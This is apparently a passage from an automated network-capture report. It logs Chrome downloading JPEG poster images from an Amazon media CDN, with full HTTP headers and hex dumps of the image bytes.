                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: db 26 33 24 a6 ba 3f 95 d1 63 12 f0 fa 47 b8 69 21 d2 24 10 90 a4 86 91 05 50 d0 29 54 6c f0 9d 9d 9e 9f d7 1d 6b 29 a5 a3 1a 9e a4 77 ba 75 24 01 8b 54 a7 31 b7 25 a0 56 f5 68 3e 63 a2 c7 80 5f 3d c4 71 84 49 0e 03 d9 72 b8 9c 99 d9 92 5e 83 18 59 62 cd a2 5c 95 1e 10 dd f7 32 5f 0e 51 29 6f 9b 8d 1e 62 36 91 6c ab 9a 8d 34 ca 9a 27 c8 ca 88 bd 64 6d eb 17 e8 cf 84 5f e3 09 e0 13 88 19 81 25 34 a1 18 c4 e3 dc 58 20 f9 46 7e 68 52 96 c2 79 ec 5f 71 d9 6b 2e d6 32 44 92 e8 90 e9 ce 5a c0 5e e3 ef f0 d2 09 95 4b d0 d2 75 1f 11 5c c7 34 31 a1 ce 82 22 4a 7a 61 7b 1d 1a 37 84 96 82 f9 7f c3 c7 db d8 ce 3a fa 78 ac 47 bd c4 27 ea 50 ab 4a c4 74 df 73 56 82 9e e0 37 cf 1c e5 bc 05 ee 3e dc a4 51 c3 96 35 ee 5b 8c 56 0d 19 34 19 13 f4 3d a1 91 71 7a 17 e4 97 9c
                                                                                                                                                                                          Data Ascii: &3$?cGi!$P)Tlk)wu$T1%Vh>c_=qIr^Yb\2_Q)ob6l4'dm_%4X F~hRy_qk.2DZ^Ku\41"Jza{7:xG'PJtsV7>Q5[V4=qz
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 07 5c 06 3b 60 60 db 16 0c 76 95 55 29 a5 ca c5 8d 58 b5 2c 38 8e d1 ca 8a 3c ad eb 34 e3 f9 02 08 58 1e c2 07 35 03 75 67 4d 2a 4e bd 84 4b 10 52 4e 8d 51 8f a8 a7 cb 65 b4 d7 e5 a8 0a 44 5b 80 de c2 47 7c 0b 76 c6 0d 83 8b a9 70 5d c5 20 e8 16 e0 20 27 52 9c 0e f4 5b bd 1d 14 cd 40 06 dc 20 73 8c 17 52 ed 62 3c ce 82 bb d0 14 a6 b6 0c fb ca 05 32 41 5a 37 2d 8c 3c 6a 8a e1 60 cc 27 dd 72 b3 98 00 50 65 30 10 7a ca 43 d8 77 48 6e 6d 51 ba 09 a6 37 18 b5 5b 29 8e 68 6b a7 a6 b6 5b c7 67 1c 7f be d3 4f 81 cb fa dc 8a 77 e3 4e 62 8b 3e 65 ac be ad 69 ee 85 b5 16 a3 41 7f 21 a4 a9 e5 24 10 ec 84 df b3 83 52 56 13 01 8a 04 68 08 b6 bc cc 4a d9 a7 4b 4f ee 06 5d 35 74 6e 31 07 1a f4 2f f7 04 52 e0 e1 8f b6 4b 19 d8 52 bb 9d 31 63 20 40 d1 88 a1 6e cb 8f 2d 3f
                                                                                                                                                                                          Data Ascii: \;``vU)X,8<4X5ugM*NKRNQeD[G|vp] 'R[@ sRb<2AZ7-<j`'rPe0zCwHnmQ7[)hk[gOwNb>eiA!$RVhJKO]5tn1/RKR1c @n-?
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 67 49 c6 2b 73 2c e5 2f 26 20 a0 01 e5 98 96 cf 2a ea ee e6 2c 4b c1 33 7c ac 06 a2 a4 f6 a6 e8 68 00 c2 3c 2f 8d 7d f7 d4 3f 01 ca 7a 3a 61 02 7a 7d 53 5b da 3c bc c3 7e 32 35 6d c9 7e 0d 6e 18 9a 72 95 1f 50 84 05 6d 88 c8 66 f2 61 00 01 80 c0 77 ea 8d 5b c9 bd fe d8 1b 59 49 99 50 dd e5 50 6d 1f 88 d8 37 62 46 77 46 8c 09 74 eb 96 cc d8 ab bf f7 ca 87 40 b6 26 9c 31 6e af ea 3b f0 1c a7 a0 4d 11 99 75 9e 63 b4 59 79 8a 93 a4 b1 6e 15 05 7b 02 cc 8b 83 b8 84 04 07 cc fb ec 40 6c a8 9b a2 af 00 ed 06 0a 1a 51 89 59 63 ee 37 90 24 80 59 8e 5d 04 20 ae 6b 24 42 bc b3 aa ba 01 aa cc 2a 8f 91 03 e3 0b c3 26 58 80 44 dc 49 52 31 bd 0d c2 0c 2c 1f c5 4f c0 39 4f 47 08 d3 32 00 ea 4d 7f 30 f9 16 04 1d ef 60 42 29 9a 21 51 d8 b6 88 2f 4e f0 62 14 ea 20 b7 17 d8
                                                                                                                                                                                          Data Ascii: gI+s,/& *,K3|h</}?z:az}S[<~25m~nrPmfaw[YIPPm7bFwFt@&1n;MucYyn{@lQYc7$Y] k$B*&XDIR1,O9OG2M0`B)!Q/Nb


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          131192.168.2.1649872151.101.193.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC676OUTGET /images/M/MV5BMDM2ZGY5MDQtZTUyMS00ZTgzLTk4YWMtMWM2YjE2NWQ1Yjk3XkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                          Referer: https://fsharetv.co/
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC616INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 35202
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 036f2465-e766-48fb-8157-283d069149d8
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Thu, 02 Mar 2017 01:17:27 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Thu, 03 Nov 2044 21:55:40 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Age: 446465
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100143-IAD, cache-ewr-kewr1740076-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, MISS from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 cb 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 34 00 00 01 04 03 01 00 00 00 00 00 00 00 00 00 00 00 05 03 04 06 07 01 02 08 00 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 e8 b5 3d aa 15 df 1e 66 fb a7 90 53 28 78
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"4=fS(x
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 46 89 dd 70 06 63 19 56 86 a4 15 d5 f9 ee aa de e9 aa f6 64 39 b8 fd ec ab 55 1b 24 39 1c 18 f6 c8 aa 06 d8 77 b4 5d 7d 60 d9 28 d1 a0 0a 85 22 f5 5b 2a ac 07 56 15 5d 63 d0 12 38 46 bc 6e b4 6b a6 9c bd 01 d0 fc 09 d3 51 9f 47 7b 9c ef a9 c0 97 b5 ca 33 9d 7c 01 eb 6b 22 34 9f 07 4c 40 c8 e9 be 43 7b 35 17 87 7c 85 84 69 e4 27 4f 9f 11 63 4e b2 b4 65 91 49 f4 b9 b6 c9 7a 7b 76 ac d8 3d 90 26 51 ae 37 0f b8 ae cb c0 71 4c 3b d4 8a c9 98 42 ca f2 b8 2f 21 cd a0 14 22 5b 5a ea ca 4e 26 ab 4d fc f5 f6 31 21 aa d8 79 3b 26 66 a5 5b cf 62 8e 6d ae eb 9d 72 f5 c3 65 56 a6 5b 3a 8b 0b be 99 4e b0 e5 2e f1 e6 d8 58 34 ca 76 4e 2d b5 39 f9 c4 1f 3e 98 01 d8 a8 d9 d5 62 d6 be b7 fa bc be 71 34 52 f5 a6 da ca 5f 0d b2 e7 0a d6 c6 cd 89 4d fe 20 cc c6 5d 49 8d 7c a4
                                                                                                                                                                                          Data Ascii: FpcVd9U$9w]}`("[*V]c8FnkQG{3|k"4L@C{5|i'OcNeIz{v=&Q7qL;B/!"[ZN&M1!y;&f[bmreV[:N.X4vN-9>bq4R_M ]I|
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8f 3b 6b b2 3c 1c d4 2f 4e 7d b0 9a dd 1c 33 15 22 87 b9 7d 17 31 94 18 6c ca a4 a0 28 1b aa b3 bc 03 6e 5f 44 a4 60 68 de 9f 38 fc e2 b9 4e 32 b3 7c d5 cf 1f a7 9c eb 98 cb 3e c6 19 42 8f 2e 43 d9 f8 e6 d2 11 da 60 dc bc 9e 2d aa 24 6d 73 e8 d9 7b 5c d4 cd cf db e2 05 e7 ae 86 e7 ae 5f 55 86 71 9f 39 e8 b3 96 cd a7 12 b5 ec bb da 33 c6 dc c8 3d 75 42 a5 02 14 cd a1 a3 42 8f 27 11 41 e4 de 6b 6d 7d 9a 6e 19 a9 64 ae a0 6a cf 94 52 72 f0 5f b3 5e 53 28 2f 45 be 1c 47 cd 54 8a da da 74 b9 f5 a1 59 68 d1 c3 97 98 b8 44 6a 61 a3 8c 7a ac cb 36 b0 b4 7d 5f 95 09 cf 3d 0b 04 52 aa 7d 6b 6b c7 ec 55 9b da 8b 8a a5 c5 b7 e0 a9 f6 b6 f4 4e a7 de d6 70 15 0e 2d ff 00 27 50 7a e0 c8 53 d9 b8 30 14 fa 96 de c8 a8 b4 b8 b2 ca 65 4b 8f 2d 53 fb 5b d8 84 aa 3c 5b 8d 53
                                                                                                                                                                                          Data Ascii: ;k</N}3"}1l(n_D`h8N2|>B.C`-$ms{\_Uq93=uBB'Akm}ndjRr_^S(/EGTtYhDjaz6}_=R}kkUNp-'PzS0eK-S[<[S
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: e4 0b e5 fe 1c fa 55 51 b5 82 8f d3 11 bf 01 d2 49 1e 2c a3 b4 da 6c 2f 91 e8 63 e3 a5 84 73 c8 a1 5d 02 17 c6 25 42 8e 9d 47 6d 3d 32 ea e6 08 83 db 3a 75 bd da 52 5b be 2d a0 96 f6 fb 71 ab 6a 9e b3 3b 6e 56 e6 9c 5e de d2 4a 90 9b ac 73 6d 4f ca e2 2d a5 bb 35 a0 cb a8 bf 6d 45 ac 54 0d 51 6b b9 f7 a3 5c 0f 23 8e ec eb b7 82 26 3f 7e f7 13 3a d1 52 71 04 fd 86 c2 df 96 a6 12 6f bb 2b a5 16 b1 c1 54 89 93 40 c8 59 46 18 af cf d8 d0 26 e0 f1 e9 67 99 9d 4e 8f 31 d1 bf 1b 07 a1 bc 2b 95 2d 96 83 50 58 ac 74 17 2c 7b 8b 1c aa d7 e5 ee e1 60 42 b9 9e 7d d5 dc b6 7e 3f 76 3d 22 9e 6c 73 6f ee 37 a9 5d 6b ec e9 ef ab 75 05 9d aa a5 29 65 b6 77 4e bc 40 66 e6 e6 e1 f4 e5 39 ee 73 59 98 54 21 df 48 1f b4 4f a5 86 be e3 72 15 52 c0 98 96 54 ac c6 16 a0 81 16 ca
                                                                                                                                                                                          Data Ascii: UQI,l/cs]%BGm=2:uR[-qj;nV^JsmO-5mETQk\#&?~:Rqo+T@YF&gN1+-PXt,{`B}~?v="lso7]ku)ewN@f9sYT!HOrRT
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 4a 7d d5 ac 62 56 7c ce 45 7e 16 ff 00 fd af 20 69 81 1f e3 30 f0 57 1f cf a6 e1 7d 47 cd 44 f9 b3 ab a7 f5 76 41 73 b3 7e 5f 71 78 0d fa a3 95 f8 e9 9d 4b db c5 e9 ea 76 59 6c ac f2 1f 77 57 55 38 ef c9 06 cf 96 ee 71 1a a3 a7 f2 6d c6 f7 70 68 55 5a 5c da 11 8f 23 30 ae df b1 57 8d 63 ce 75 e2 d2 ba a4 ad 68 aa 76 18 6c 32 ff 00 c3 db a3 ef 6b 36 3c 54 77 3a 65 5c 89 b2 2c 2f a8 d6 13 2f af b8 35 1b a7 47 c1 a7 40 8c 8c 0e da f3 17 60 59 4d 68 cf db 33 b7 3b 70 54 60 c7 b7 e4 7b c6 ac 09 d5 59 fd ad 89 9c b6 03 2b b3 9f d9 99 8d f5 35 9a e6 46 33 e3 37 17 c3 ca ed 9d 15 61 a8 d9 55 a2 95 38 97 9b d8 99 90 09 8f e2 55 d2 ed ad 48 96 74 47 d7 b2 fa bb 2e 50 ad 9d bf 8a ee 28 c5 e0 3b f3 2e ab 98 8e 85 25 28 d6 ba aa 25 6b 50 08 27 cc 72 10 4b 59 ed 7d 4e
                                                                                                                                                                                          Data Ascii: J}bV|E~ i0W}GDvAs~_qxKvYlwWU8qmphUZ\#0Wcuhvl2k6<Tw:e\,//5G@`YMh3;pT`{Y+5F37aU8UHtG.P(;.%(%kP'rKY}N
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 82 26 01 fe eb a5 6a 9a 8d 13 0e c6 98 f8 82 b6 d9 5c 74 07 72 cb b8 b2 20 2d de 72 93 24 85 75 e4 d9 3b 09 c2 ec 87 f7 85 37 36 ac 69 8e 9c 18 98 b6 0b 2f 56 8f 8e b6 72 0c e2 cc 70 c9 61 f4 c0 a0 5b 67 9e a3 82 3f 95 31 32 17 7e da bc f9 80 2a f9 99 f7 5d 97 f1 46 09 6e 45 fa 69 f6 37 ae 63 f0 ee 99 8a 42 be d9 d8 de fe 33 3f 6d 11 02 a3 3f e3 45 26 a4 69 4e 32 21 df a9 21 47 93 78 04 6f d2 db f8 39 95 bf 6b 93 1b 2d e3 a9 46 cf 2b 4f 4f fc 0c c9 1b d9 09 4b 6e b3 06 1a e8 02 28 51 b8 06 be 1a c7 af dc 9d 3b 3f eb 18 ce 1d 91 c2 1c 1a 7e 65 d8 22 f1 a9 5f 4d b3 14 3b a5 0e 97 00 62 e2 d6 9b e3 c8 56 09 6c 74 17 a3 bb 5b 6b 92 79 1b 0c e9 3f 83 6f d3 a9 02 76 02 61 d8 d2 8c 61 4c 6d 1f 9c 65 ee 58 8b 1b 0e a7 83 0e b6 db 05 c7 46 e6 05 7d 3c 9f 0c 9f ba
                                                                                                                                                                                          Data Ascii: &j\tr -r$u;76i/Vrpa[g?12~*]FnEi7cB3?m?E&iN2!!Gxo9k-F+OOKn(Q;?~e"_M;bVlt[ky?ovaaLmeXF}<
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 60 63 c7 cd 7c bb 7e 2f df 69 a1 d7 ef c3 71 d1 69 6a 71 1c 47 f2 2b 31 4f 81 f6 fc 4f 86 f1 e0 cf 0b 34 4c e1 b8 3d a6 04 e0 3c 76 0d 82 74 7a 05 3d cd 41 2d fc df ee 15 b6 98 43 4b 6b 50 d6 db 63 2b 56 53 e8 f5 93 dc 86 b7 07 63 b6 7b 81 e2 e3 b6 a5 6b c7 72 d5 2e bc 41 a9 bf 70 43 8f e4 ce c1 d4 ec 7c 95 ad 38 28 5f b6 da fb 8a 56 0c 57 f3 1a a3 5c ec ec 2e d6 b6 48 7c 4e db 34 55 31 46 a7 4e ff 00 3f 5b 7f 37 f5 66 e2 37 3b 82 77 44 ee c2 fa f1 3b 82 0b 7e 27 73 e6 1b 75 39 78 dc ee 89 dc 9d d1 3b 83 fa ee 7c ce ec ee 7c c3 66 b7 3b 90 59 bd 45 3b f3 f7 37 81 07 ff 00 83 37 01 df c4 e9 df 2f eb 6f e6 df f6 9b 9c a0 3f 7e a7 19 c7 50 2c d7 a7 4f f9 7f 53 80 b3 e8 16 7e 9e 27 e9 e2 7d 02 cf a0 59 f4 0b 3f 4f 49 f4 0b 3e 81 67 e9 e9 3f 4f 49 fa 7a 4f d3
                                                                                                                                                                                          Data Ascii: `c|~/iqijqG+1OO4L=<vtz=A-CKkPc+VSc{kr.ApC|8(_VW\.H|N4U1FN?[7f7;wD;~'su9x;||f;YE;77/o?~P,OS~'}Y?OI>g?OIzO
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: cf ea 8e a2 23 26 b4 fc 1b 88 cb 53 ca 23 46 72 d7 b1 c7 72 d7 51 49 ad cc c3 08 f3 bb 9c be e3 e3 d9 a6 38 5b d8 89 59 91 c0 64 a2 dc 39 a0 79 0d 91 9a d5 61 32 24 4a 16 d9 d1 b3 46 59 8b 66 31 ac 5f 20 14 da 86 a4 e1 a1 63 67 30 f2 d6 13 a8 05 8a 95 24 15 b0 99 d7 72 c9 63 2c 4b b9 fe 5b 39 1b aa 3b 29 25 46 74 3a 44 ea 4e 52 e2 e6 dd 60 76 b3 d4 4d c3 cd 47 83 b7 6c 54 7f 80 ab d6 20 c5 5c f3 94 0f 19 1c a8 de af 22 60 96 f8 3b 8e f2 46 d6 8c a9 13 aa 5e 48 00 fb 84 25 47 19 48 e3 56 bc 4c c5 21 58 e6 5e 8d 41 92 07 65 60 92 8d eb 2e db 98 b3 69 1c 62 c3 48 ba 43 cd 3d 6b c7 95 92 5b a4 8d 37 3c 57 82 52 c0 47 f8 0a d5 a6 68 d2 27 4f 98 4d b8 35 1d 46 62 41 a4 79 67 62 ac c2 fb 79 64 e9 6f f2 4d 1b 6b e9 36 b1 6b 29 23 5d e4 d9 de e5 89 7b 4b b0 ae 0b
                                                                                                                                                                                          Data Ascii: #&S#FrrQI8[Yd9ya2$JFYf1_ cg0$rc,K[9;)%Ft:DNR`vMGlT \"`;F^H%GHVL!X^Ae`.ibHC=k[7<WRGh'OM5FbAygbydoMk6k)#]{K
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 4f 92 91 4b ac 5d 4c 36 bd a5 d0 53 db 79 46 d1 81 dd 56 95 62 8e 50 aa 58 a8 e3 c3 b6 58 9a d1 7f b2 5a 6b d8 14 ec 6b cd 42 0b 35 52 d6 77 d3 cb b9 a4 b3 d5 24 b8 d4 98 d1 b6 86 59 af 66 6d 2c 37 a2 8f 74 e1 0e a5 26 75 47 cc e2 28 ad 66 64 b1 ba ba 68 43 5d c7 05 94 5a 86 9c d6 d3 9c f4 32 31 f3 64 8b b5 de 8e 5b 7b 34 8c 36 f0 45 68 c3 2f 30 a5 b1 8d ad ee 67 33 09 27 8a ca d8 5d 4c f6 f6 26 33 69 0c f1 5d a6 6d f4 4b b7 53 1c c2 31 1a 05 5b 4f 5a 26 67 5f a3 85 17 12 5c bc 71 c5 69 da 8d b5 28 20 fc 2e 1d 75 15 11 2b 21 46 2a d5 8a b3 03 2d 52 4a 00 da 5e 5d c4 53 36 e2 48 d3 e5 64 8e e9 96 d7 4a bb 9d 12 07 bc d1 11 9d ae 1e 2d 62 c5 7b 61 87 f2 8b 23 e5 ef d9 a3 59 51 f5 38 93 20 0b a9 65 94 30 ed bc 97 0c 1e 2b 39 0d b8 b6 91 74 98 00 e5 20 44 fc
                                                                                                                                                                                          Data Ascii: OK]L6SyFVbPXXZkkB5Rw$Yfm,7t&uG(fdhC]Z21d[{46Eh/0g3']L&3i]mKS1[OZ&g_\qi( .u+!F*-RJ^]S6HdJ-b{a#YQ8 e0+9t D
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: 8e ca 06 10 a1 b9 0a 8f 84 37 a1 27 59 e4 ed c2 aa 16 ea 8f 34 1e 5b bc 47 e0 20 de 58 f8 8f ae 94 fd 70 f0 14 19 55 55 17 ec 6e b3 18 4a 42 7b de f4 b2 da f2 32 93 a3 39 f9 2c e2 b1 a4 32 47 c9 5e 13 bd 53 ff 00 96 f5 5c f7 cf 4e e4 f6 1a c0 85 65 14 85 bb 4b 9f 4c 06 a8 e3 5e 14 0a d5 99 e3 34 67 11 9c 9b ba 3d 82 db 9e f9 f1 52 2f 17 e7 16 41 fa a0 bb 66 e1 09 36 56 0b 88 6c 9b cd 5c e5 7a 4f 6c 93 f2 ce 6a 92 6f 53 ea ac 71 ba a7 61 ad ea ad d8 50 22 be ad 2c 15 95 a2 c2 ff 00 0d e8 b5 eb 7d 8b ac ee ef b7 f4 42 9b 78 f1 41 05 0a 97 4b cd 31 db 54 2a a1 1d ad 22 f2 3d a5 c2 f1 68 0c 02 92 eb 6c f9 c9 47 fe c1 33 c3 e5 48 34 5d 5a f3 2a 23 cd 17 1b 6d a5 7e c6 1e 36 ec 0e 3e 23 a1 3c 3e e7 70 47 f6 63 2a c6 7e 38 2e a0 ff 00 24 2b f9 35 de 6e 4a 2f f4
                                                                                                                                                                                          Data Ascii: 7'Y4[G XpUUnJB{29,2G^S\NeKL^4g=R/Af6Vl\zOljoSqaP",}BxAK1T*"=hlG3H4]Z*#m~6>#<>pGc*~8.$+5nJ/


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          132192.168.2.1649873151.101.65.164436700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2024-12-15 11:38:16 UTC461OUTGET /images/M/MV5BMGRlOWYyZjItMzMwZS00ZTA5LTliYWUtZWQxZTllOTQ1Y2VlL2ltYWdlL2ltYWdlXkEyXkFqcGdeQXVyNjc1NTYyMjg@._V1_SX300.jpg HTTP/1.1
                                                                                                                                                                                          Host: m.media-amazon.com
                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                          2024-12-15 11:38:16 UTC615INHTTP/1.1 200 OK
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          Content-Length: 36697
                                                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                                                          X-Amz-IR-Id: 8a245f5e-a67e-4d95-ac13-56cf4bdf5752
                                                                                                                                                                                          Cache-Control: max-age=630720000,public
                                                                                                                                                                                          Last-Modified: Mon, 19 Dec 2016 19:41:17 GMT
                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                          Expires: Mon, 05 Dec 2044 05:22:22 GMT
                                                                                                                                                                                          X-Nginx-Cache-Status: MISS
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Date: Sun, 15 Dec 2024 11:38:16 GMT
                                                                                                                                                                                          Age: 454554
                                                                                                                                                                                          X-Served-By: cache-iad-kjyo7100120-IAD, cache-ewr-kewr1740028-EWR
                                                                                                                                                                                          X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                          Server-Timing: provider;desc="fy"
                                                                                                                                                                                          alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c2 00 11 08 01 c6 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 36 00 00 01 04 03 01 01 00 00 00 00 00 00 00 00 00 00 07 04 05 06 08 00 02 03 01 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 01 02 05 06 00 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 b3 bb 64 4d 37 25 fb 8a b7 13 65 3f
                                                                                                                                                                                          Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*,"6dM7%e?
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f6 8f 24 a7 d7 16 b5 d6 d5 bb 9a d4 7a 0e cf 1c c7 45 25 ee cd ce 6c 5c 15 05 a5 c5 f0 81 2f 2f 84 47 d8 6b a1 26 85 33 2f 7f 31 b2 13 25 66 f6 93 ff 00 54 6a 33 ba 2b b0 e2 81 c7 57 88 58 18 33 81 86 eb a9 8d b5 c1 35 53 0f 45 23 e7 19 bd 90 0a de fc 54 20 f7 96 9a 5c 65 af b5 1f bc 74 6e d5 bc 6c af fc d3 9a 79 70 a8 ad ea 72 b0 26 e5 3a 7a a3 f8 97 8d 07 a6 39 9a e6 20 7a b9 10 66 50 f4 9e 92 34 0e c3 d1 62 b0 d0 65 c3 41 19 43 24 aa 7b af ce 01 f8 4f 20 35 39 9e 0e b3 9e 5f 4e b9 7c 7e 48 a6 cd e1 58 91 5b dc 9a e0 01 f8 17 56 0f 29 d8 5d f3 43 58 8d 30 a1 ee b0 ed af 30 81 b7 0c c2 69 47 41 d6 ca c7 7a d9 63 fb 65 1f 7f 38 aa b5 68 5d f7 a0 77 b7 4e 8a aa a5 ac a7 00 bd ba 04 3e 20 ad de db 41 af 4b 6b 28 80 21 eb 6d 26 a1 fc 8e 3f ad cd af 9b 46 d7
                                                                                                                                                                                          Data Ascii: $zE%l\//Gk&3/1%fTj3+WX35SE#T \etnlypr&:z9 zfP4beAC${O 59_N|~HX[V)]CX00iGAzce8h]wN> AKk(!m&?F
                                                                                                                                                                                          2024-12-15 11:38:16 UTC1378INData Raw: f9 84 32 27 81 d0 89 8b 26 7f 5e c0 af 5e 1a 5c a9 a0 51 19 7e 81 11 97 34 ac c4 ed f6 f7 4e 64 a2 ac e1 ad d7 55 a2 7c f5 ba 6d c3 4f 4f 6e a9 f6 13 4a 66 b0 39 d7 b3 e6 75 b0 f4 27 67 2e 37 2a 91 6a b6 c3 0f 47 7d 28 56 8c e2 90 b0 b7 c8 9c c6 68 78 1e fa 9d 9e 72 0b a7 bc 91 ed ad 6b b3 73 96 ff 00 cc 16 05 0d a1 41 be 16 6b 78 cc 9f a0 c1 3b 3a c5 b4 b8 ff 00 16 c5 65 a6 4e 6f db 9f 5c 6e df cc db 5f 5b 6e 7b e5 d6 f7 5c f7 de f3 a7 9e d6 fa ef e7 4a 16 38 4c 84 cc 1b e6 e5 cd 81 ab 14 6c ce 10 c3 cd 4a f3 12 36 41 b2 06 02 b5 ab 91 35 84 79 12 d7 be 66 6b 07 a5 e0 72 a1 d4 50 dd 2c 62 ca ec ad 6a d4 ca b7 be 6e ac 2e 67 0b 8b 44 39 b7 1e b8 ff 00 40 d2 0d 3f e3 74 83 b2 ec 41 a9 cb 17 5c e6 d2 1c ed 21 5e c4 88 cc d1 9d 18 dd 85 a4 4d 6a 20 ec 96 a9
                                                                                                                                                                                          Data Ascii: 2'&^^\Q~4NdU|mOOnJf9u'g.7*jG}(VhxrksAkx;:eNo\n_[n{\J8LlJ6A5yfkrP,bjn.gD9@?tA\!^Mj
